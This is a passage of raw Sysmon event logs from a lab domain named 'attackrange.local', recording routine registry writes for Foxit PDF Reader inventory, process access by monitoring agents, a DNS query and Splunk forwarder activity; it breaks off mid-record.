13241300x800000000000000039703Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localInvDB-PathSetValue2023-01-18 12:16:52.626{FE4C2B44-E333-63C7-FE05-00000000AF02}5372C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{6d1e428c-e8ee-7858-3823-1e4d4d9e6b5f}\Root\InventoryApplicationFile\foxitpreviewhost|5bd850ff9cc7b40\LowerCaseLongPathc:\program files (x86)\foxit software\foxit pdf reader\shell extensions\foxitpreviewhost.exe 13241300x800000000000000039702Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localInvDB-VerSetValue2023-01-18 12:16:52.626{FE4C2B44-E333-63C7-FE05-00000000AF02}5372C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{6d1e428c-e8ee-7858-3823-1e4d4d9e6b5f}\Root\InventoryApplicationFile\foxitpdfreaderup|1067dd6c4da9a47a\BinProductVersion1.0.0.1 13241300x800000000000000039701Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localInvDB-CompileTimeClaimSetValue2023-01-18 12:16:52.626{FE4C2B44-E333-63C7-FE05-00000000AF02}5372C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{6d1e428c-e8ee-7858-3823-1e4d4d9e6b5f}\Root\InventoryApplicationFile\foxitpdfreaderup|1067dd6c4da9a47a\LinkDate05/20/2022 15:12:12 13241300x800000000000000039700Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localInvDB-PubSetValue2023-01-18 12:16:52.626{FE4C2B44-E333-63C7-FE05-00000000AF02}5372C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{6d1e428c-e8ee-7858-3823-1e4d4d9e6b5f}\Root\InventoryApplicationFile\foxitpdfreaderup|1067dd6c4da9a47a\Publisherfoxit software inc. 13241300x800000000000000039699Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localInvDB-PathSetValue2023-01-18 12:16:52.626{FE4C2B44-E333-63C7-FE05-00000000AF02}5372C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{6d1e428c-e8ee-7858-3823-1e4d4d9e6b5f}\Root\InventoryApplicationFile\foxitpdfreaderup|1067dd6c4da9a47a\LowerCaseLongPathc:\program files (x86)\foxit software\foxit pdf reader\foxitpdfreaderupdateservice.exe 13241300x800000000000000039698Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localInvDB-VerSetValue2023-01-18 12:16:52.626{FE4C2B44-E333-63C7-FE05-00000000AF02}5372C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{6d1e428c-e8ee-7858-3823-1e4d4d9e6b5f}\Root\InventoryApplicationFile\foxitpdfreader.e|6c0974eb9439b2c1\BinProductVersion12.1.0.15250 13241300x800000000000000039697Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localInvDB-CompileTimeClaimSetValue2023-01-18 12:16:52.626{FE4C2B44-E333-63C7-FE05-00000000AF02}5372C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{6d1e428c-e8ee-7858-3823-1e4d4d9e6b5f}\Root\InventoryApplicationFile\foxitpdfreader.e|6c0974eb9439b2c1\LinkDate12/05/2022 10:40:21 13241300x800000000000000039696Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localInvDB-PubSetValue2023-01-18 12:16:52.626{FE4C2B44-E333-63C7-FE05-00000000AF02}5372C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{6d1e428c-e8ee-7858-3823-1e4d4d9e6b5f}\Root\InventoryApplicationFile\foxitpdfreader.e|6c0974eb9439b2c1\Publisherfoxit software inc. 13241300x800000000000000039695Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localInvDB-PathSetValue2023-01-18 12:16:52.626{FE4C2B44-E333-63C7-FE05-00000000AF02}5372C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{6d1e428c-e8ee-7858-3823-1e4d4d9e6b5f}\Root\InventoryApplicationFile\foxitpdfreader.e|6c0974eb9439b2c1\LowerCaseLongPathc:\program files (x86)\foxit software\foxit pdf reader\foxitpdfreader.exe 13241300x800000000000000039694Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localInvDB-VerSetValue2023-01-18 12:16:52.626{FE4C2B44-E333-63C7-FE05-00000000AF02}5372C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{6d1e428c-e8ee-7858-3823-1e4d4d9e6b5f}\Root\InventoryApplicationFile\foxitpdfcef.exe|a90e7f3c1f2d9f7\BinProductVersion12.1.0.0 13241300x800000000000000039693Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localInvDB-CompileTimeClaimSetValue2023-01-18 12:16:52.626{FE4C2B44-E333-63C7-FE05-00000000AF02}5372C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{6d1e428c-e8ee-7858-3823-1e4d4d9e6b5f}\Root\InventoryApplicationFile\foxitpdfcef.exe|a90e7f3c1f2d9f7\LinkDate11/24/2022 09:06:20 13241300x800000000000000039692Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localInvDB-PubSetValue2023-01-18 12:16:52.626{FE4C2B44-E333-63C7-FE05-00000000AF02}5372C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{6d1e428c-e8ee-7858-3823-1e4d4d9e6b5f}\Root\InventoryApplicationFile\foxitpdfcef.exe|a90e7f3c1f2d9f7\Publisherfoxit software inc. 13241300x800000000000000039691Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localInvDB-PathSetValue2023-01-18 12:16:52.610{FE4C2B44-E333-63C7-FE05-00000000AF02}5372C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{6d1e428c-e8ee-7858-3823-1e4d4d9e6b5f}\Root\InventoryApplicationFile\foxitpdfcef.exe|a90e7f3c1f2d9f7\LowerCaseLongPathc:\program files (x86)\foxit software\foxit pdf reader\foxitpdfcef.exe 13241300x800000000000000039690Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localInvDB-VerSetValue2023-01-18 12:16:52.610{FE4C2B44-E333-63C7-FE05-00000000AF02}5372C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{6d1e428c-e8ee-7858-3823-1e4d4d9e6b5f}\Root\InventoryApplicationFile\64bitmailagent.e|db093837ef4290d3\BinProductVersion1.0.8.1228 13241300x800000000000000039689Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localInvDB-CompileTimeClaimSetValue2023-01-18 12:16:52.610{FE4C2B44-E333-63C7-FE05-00000000AF02}5372C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{6d1e428c-e8ee-7858-3823-1e4d4d9e6b5f}\Root\InventoryApplicationFile\64bitmailagent.e|db093837ef4290d3\LinkDate05/20/2022 15:01:43 13241300x800000000000000039688Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localInvDB-PubSetValue2023-01-18 12:16:52.610{FE4C2B44-E333-63C7-FE05-00000000AF02}5372C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{6d1e428c-e8ee-7858-3823-1e4d4d9e6b5f}\Root\InventoryApplicationFile\64bitmailagent.e|db093837ef4290d3\Publisherfoxit software inc. 13241300x800000000000000039687Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localInvDB-PathSetValue2023-01-18 12:16:52.610{FE4C2B44-E333-63C7-FE05-00000000AF02}5372C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{6d1e428c-e8ee-7858-3823-1e4d4d9e6b5f}\Root\InventoryApplicationFile\64bitmailagent.e|db093837ef4290d3\LowerCaseLongPathc:\program files (x86)\foxit software\foxit pdf reader\64bitmailagent.exe 13241300x800000000000000039686Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localInvDB-PubSetValue2023-01-18 12:16:52.610{FE4C2B44-E333-63C7-FE05-00000000AF02}5372C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{6d1e428c-e8ee-7858-3823-1e4d4d9e6b5f}\Root\InventoryApplication\000051e80f0bed177961040f6171bd1efa830000ffff\PublisherFoxit Software Inc. 10341000x800000000000000039685Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:52.386{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E333-63C7-FF05-00000000AF02}6188C:\Windows\system32\conhost.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000039684Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:52.386{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E333-63C7-FF05-00000000AF02}6188C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000039683Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:52.385{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E333-63C7-FF05-00000000AF02}6188C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000039682Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:52.382{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E333-63C7-FE05-00000000AF02}5372C:\Windows\system32\compattelrunner.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000039681Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:52.381{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E333-63C7-FE05-00000000AF02}5372C:\Windows\system32\compattelrunner.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000039680Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:52.381{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E333-63C7-FE05-00000000AF02}5372C:\Windows\system32\compattelrunner.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000039679Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:52.381{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E333-63C7-FE05-00000000AF02}5372C:\Windows\system32\compattelrunner.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000039678Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:52.381{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E333-63C7-FE05-00000000AF02}5372C:\Windows\system32\compattelrunner.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000039677Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:52.381{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E333-63C7-FE05-00000000AF02}5372C:\Windows\system32\compattelrunner.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 22542200x800000000000000039676Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:48.816{FE4C2B44-E326-63C7-F905-00000000AF02}3260startpage.foxitsoftware.com0::ffff:184.105.214.144;::ffff:184.105.214.143;C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe 354300x800000000000000039675Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:50.706{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56219-false10.0.1.12-8000- 10341000x800000000000000039674Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:52.300{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2900-00000000AF02}2712C:\Windows\system32\dfssvc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039673Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:52.088{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2064e|C:\Windows\SYSTEM32\ntdll.dll+1e864|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039672Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:52.088{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2064e|C:\Windows\SYSTEM32\ntdll.dll+1e864|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039671Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:52.088{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc 10341000x800000000000000039670Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:52.088{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc 23542300x800000000000000015073Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:16:53.651{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC6A3A665246A2669E7F4B68720082DC,SHA256=A86E7938841DF6942EFA9F1534A6D335E10C31BD44D4002535C587494874B4D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000039729Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:53.921{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63B3F853EB908C3187DAC594B70A5453,SHA256=76CE746E5F37D2C6649AA5F354C3F441DC896D3C51376E8A852C342C5E5E4A39,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015075Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:16:54.745{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B21FF24D8131016F4216D554647750A9,SHA256=5F718D60E6DB785DBC7E6A408D4CDE9450ADF6B2DABB516FC34B486320706623,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000039757Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:54.980{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039756Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:54.979{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E318-63C7-EF05-00000000AF02}5628C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.5351_none_7f0b8fbe21ea4a21\TiWorker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039755Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:54.978{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E318-63C7-EE05-00000000AF02}3480C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039754Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:54.977{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E317-63C7-ED05-00000000AF02}6268C:\Program Files (x86)\Foxit Software\Foxit PDF 